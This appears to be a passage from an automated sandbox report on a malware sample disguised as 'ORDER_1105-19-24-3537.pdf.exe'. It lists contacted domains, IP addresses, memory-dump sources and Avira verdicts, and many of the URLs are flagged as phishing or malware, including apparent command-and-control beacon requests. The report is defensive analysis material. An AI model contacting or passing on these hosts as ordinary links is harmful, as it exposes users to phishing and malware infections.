          http://www.beauty.universityReferer:0%Avira URL Cloudsafe
          http://www.qwechaotk.top100%Avira URL Cloudphishing
          http://www.hinet.tech/rn94/www.beauty.university0%Avira URL Cloudsafe
          http://www.beauty.university/rn94/0%Avira URL Cloudsafe
          http://www.qwechaotk.top/rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA100%Avira URL Cloudphishing
          http://www.bdkasinoxox.xyz/rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp100%Avira URL Cloudmalware
          http://www.bdkasinoxox.xyz0%Avira URL Cloudsafe
          http://www.nicoleb.tech0%Avira URL Cloudsafe
          http://www.010101-11122-2222.cloud/rn94/www.longmaosol.xyz100%Avira URL Cloudphishing
          http://www.bigbrown999.site0%Avira URL Cloudsafe
          http://www.ln2m1.shop/rn94/www.practicalfranchises.info100%Avira URL Cloudmalware
          http://www.ln2m1.shop/rn94/100%Avira URL Cloudmalware
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%Avira URL Cloudsafe
          http://www.nicoleb.tech/rn94/0%Avira URL Cloudsafe
          http://www.yzh478c.xyzReferer:0%Avira URL Cloudsafe
          http://www.hinet.tech/rn94/0%Avira URL Cloudsafe
          http://www.beauty.university/rn94/www.nicoleb.tech0%Avira URL Cloudsafe
          http://www.010101-11122-2222.cloudReferer:0%Avira URL Cloudsafe
          http://www.ln2m1.shopReferer:0%Avira URL Cloudsafe
          https://wns.windows.com/)s0%Avira URL Cloudsafe
          http://www.nicoleb.tech/rn94/www.laske.xyz0%Avira URL Cloudsafe
          http://www.day2go.net0%Avira URL Cloudsafe
          http://www.010101-11122-2222.cloud100%Avira URL Cloudphishing
          http://www.qwechaotk.topReferer:0%Avira URL Cloudsafe
          http://www.run-run.tokyo/rn94/www.010101-11122-2222.cloud100%Avira URL Cloudmalware
          www.laske.xyz/rn94/100%Avira URL Cloudmalware
          http://www.laske.xyz/rn94/100%Avira URL Cloudmalware
          http://www.run-run.tokyo/rn94/100%Avira URL Cloudmalware
          http://www.run-run.tokyoReferer:0%Avira URL Cloudsafe
          http://www.abandoned-houses-39863.bond/rn94/www.bigbrown999.site0%Avira URL Cloudsafe
          http://www.day2go.netReferer:0%Avira URL Cloudsafe
          http://www.day2go.net/rn94/www.resdai.xyz0%Avira URL Cloudsafe
          http://www.nicoleb.techReferer:0%Avira URL Cloudsafe
          http://www.yzh478c.xyz/rn94/www.hinet.tech100%Avira URL Cloudmalware
          http://www.longmaosol.xyzReferer:0%Avira URL Cloudsafe
          http://www.abandoned-houses-39863.bond0%Avira URL Cloudsafe
          https://outlook.com0%Avira URL Cloudsafe
          http://www.resdai.xyz/rn94/0%Avira URL Cloudsafe
          http://www.ln2m1.shop0%Avira URL Cloudsafe
          http://www.qwechaotk.top/rn94/100%Avira URL Cloudphishing
          http://www.day2go.net/rn94/0%Avira URL Cloudsafe
          http://www.resdai.xyz/rn94/www.qwechaotk.top0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
          http://www.010101-11122-2222.cloud/rn94/100%Avira URL Cloudphishing
          http://www.practicalfranchises.info0%Avira URL Cloudsafe
          http://www.yzh478c.xyz0%Avira URL Cloudsafe
          http://www.bdkasinoxox.xyz/rn94/www.day2go.net100%Avira URL Cloudmalware
          http://www.bigbrown999.siteReferer:0%Avira URL Cloudsafe
          http://www.laske.xyz0%Avira URL Cloudsafe
          https://api.msn.com/0%Avira URL Cloudsafe
          http://www.bdkasinoxox.xyz/rn94/100%Avira URL Cloudmalware
          http://www.hinet.tech0%Avira URL Cloudsafe
          http://crl.v0%Avira URL Cloudsafe
          http://www.longmaosol.xyz/rn94/100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.beauty.university
          35.214.167.24
          truetrueunknown
          nicoleb.tech
          50.87.178.238
          truetrueunknown
          www.hinet.tech
          13.248.252.114
          truetrueunknown
          www.abandoned-houses-39863.bond
          185.53.179.90
          truetrueunknown
          practicalfranchises.info
          3.33.130.190
          truetrueunknown
          shops.myshopify.com
          23.227.38.74
          truetrue
            unknown
            www.qwechaotk.top
            154.21.81.142
            truetrue
              unknown
              bdkasinoxox.xyz
              162.0.209.7
              truetrue
                unknown
                www.day2go.net
                unknown
                unknowntrue
                  unknown
                  www.yzh478c.xyz
                  unknown
                  unknowntrue
                    unknown
                    www.bdkasinoxox.xyz
                    unknown
                    unknowntrue
                      unknown
                      www.ln2m1.shop
                      unknown
                      unknowntrue
                        unknown
                        www.nicoleb.tech
                        unknown
                        unknowntrue
                          unknown
                          www.practicalfranchises.info
                          unknown
                          unknowntrue
                            unknown
                            www.bigbrown999.site
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.day2go.net/rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxAtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.qwechaotk.top/rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxAtrue
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.bdkasinoxox.xyz/rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSptrue
                              • Avira URL Cloud: malware
                              unknown
                              www.laske.xyz/rn94/true
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://word.office.comonexplorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.practicalfranchises.info/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.hinet.techReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.bigbrown999.site/rn94/www.bdkasinoxox.xyzexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.qwechaotk.top/rn94/www.ln2m1.shopexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.resdai.xyzReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.resdai.xyzexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.practicalfranchises.infoReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.run-run.tokyoexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://powerpoint.office.comcemberexplorer.exe, 00000006.00000002.4549228460.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2118388010.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.yzh478c.xyz/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.abandoned-houses-39863.bond/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://excel.office.comexplorer.exe, 00000006.00000002.4546921012.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876221001.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.microexplorer.exe, 00000006.00000000.2110577244.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4545353791.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4545269942.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.bdkasinoxox.xyzReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.beauty.universityexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.abandoned-houses-39863.bondReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.longmaosol.xyzexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.bigbrown999.site/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.laske.xyz/rn94/www.run-run.tokyoexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.beauty.university/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.laske.xyzReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.practicalfranchises.info/rn94/www.yzh478c.xyzexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.beauty.universityReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.hinet.tech/rn94/www.beauty.universityexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.qwechaotk.topexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.bdkasinoxox.xyzexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.nicoleb.techexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.010101-11122-2222.cloud/rn94/www.longmaosol.xyzexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.bigbrown999.siteexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.ln2m1.shop/rn94/www.practicalfranchises.infoexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.ln2m1.shop/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000006.00000000.2118388010.000000000C549000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4549228460.000000000C549000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.nicoleb.tech/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.yzh478c.xyzReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.beauty.university/rn94/www.nicoleb.techexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2126422712.0000000002D21000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.hinet.tech/rn94/explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.010101-11122-2222.cloudReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://wns.windows.com/)sexplorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.ln2m1.shopReferer:explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.nicoleb.tech/rn94/www.laske.xyzexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.010101-11122-2222.cloudexplorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
